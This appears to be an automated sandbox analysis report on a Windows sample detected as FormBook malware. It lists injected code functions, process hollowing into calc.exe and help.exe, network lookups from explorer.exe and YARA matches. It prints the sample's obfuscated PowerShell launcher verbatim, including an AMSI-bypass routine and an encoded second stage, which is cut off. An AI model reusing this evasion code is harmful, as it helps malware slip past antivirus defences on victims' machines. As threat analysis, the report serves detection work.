          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\calc.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Code function: 1_2_00401180 Sleep,Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,Sleep,exit,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 192.185.17.130 80
Source: C:\Windows\explorer.exe | Domain query: www.strawberrylinebikehire.com
Source: C:\Windows\explorer.exe | Domain query: www.rajuherbalandspicegarden.com
Injects a PE file into foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\calc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\calc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\calc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\calc.exe | Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\help.exe | Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\calc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\calc.exe | Section unmapped: C:\Windows\SysWOW64\help.exe base address: 1F0000
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\calc.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\calc.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\calc.exe base: 2BC5008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,1
05,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,1
05,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
Source: explorer.exe, 0000000A.00000000.304127753.00000000089FF000.00000004.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000A.00000000.315976236.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Columns are tactics, rows list the techniques per tactic. Digits after a technique name are the report's per-technique signature-count badges, reproduced as extracted.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 1 | Path Interception | Process Injection 712 | Rootkit 1 | Credential API Hooking 1 | Query Registry 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter 21 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Security Software Discovery 221 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
